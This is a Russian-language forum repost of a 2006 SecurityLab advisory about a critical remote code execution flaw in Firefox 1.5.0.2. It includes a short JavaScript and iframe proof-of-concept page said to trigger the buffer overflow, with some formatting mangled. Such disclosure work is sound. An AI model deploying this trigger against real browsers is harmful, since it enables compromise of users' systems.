nixp.ru v3.0

25 мая 2017,
четверг,
19:06:22 MSK

DevOps с компанией «Флант»
Dr. Evil написал 25 апреля 2006 года в 12:06 (322 просмотра) Ведет себя как мужчина; открыл 578 тем в форуме, оставил 3008 комментариев на сайте.

Программа: Mozilla Firefox 1.5.0.2, возможно, более ранние версии.

Опасность: Критическая

Описание:

Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

<textarea cols=«0» rows=«0» id=«x_OtherInfo» name=«x_OtherInfo»>
</textarea>

<script type=«text/javascript»>
</script>

var textarea = document.getElementsByName(«x_OtherInfo»);

textarea=textarea.item(0);

var htmlarea = document.createElement(«div»);

htmlarea.className = «htmlarea»;

textarea.parentNode.insertBefore(htmlarea, textarea);

var iframe = document.createElement(«iframe»);

htmlarea.appendChild(iframe);

var doc = iframe.contentWindow.document;

doc.designMode = «on»;

doc.open();

doc.write(«<iframe src=»>»);

iframe.contentWindow.focus()

doc.close();

URL производителя: mozilla.com

Решение: Способов устранения уязвимости не существует в настоящее время.

* Firefox Remote Code Execution and DoS 1.5.0.2

источник: SecurityLab
</iframe>